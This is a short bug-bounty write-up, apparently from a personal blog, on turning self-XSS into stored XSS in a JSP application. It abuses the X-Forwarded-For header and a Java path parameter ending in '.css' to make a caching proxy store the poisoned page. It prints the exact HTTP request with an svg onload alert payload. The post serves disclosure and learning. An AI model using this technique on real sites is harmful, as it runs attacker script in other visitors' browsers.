«   2021/09   »
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30    
관리 메뉴

ElMahdi - マハディ

Cache Poisoning via SelfXSS + Path Parameter 본문

카테고리 없음

Cache Poisoning via SelfXSS + Path Parameter

elmahdi 2021. 8. 28. 09:37

in this write up i will explain to you how i was able to turn self xss To stored xss In JSP Application


While searching on webarchive for JSP files of the target i found a file named common.jsp which return the ip of visitor and as everyone else might do i tried to see if i can control it via some headers such x-forwarded-for , fortunately i was able to do that


but it's just self-xss so i need to find a way to make it stored like caching so i went to try some things like cache-key query string and cache deception common.jsp/css.css but none of them work


luckily while i was thinking for a way to do that i remembered there is such a thing called Path Parameter in JAVA , so i tried to check if i could use that with .css in the end of URL and trick the proxy to cache it

GET /folder/common.jsp;mahdi.css HTTP/1.1
Host: target.com 
X-Forwarded-For: <svg/onload=alert(document.domain)>

the Backend: return content of the page + XSS payload and treat anything after semicolon as Path Parameter

Proxy: will cache it based on the end of url as css file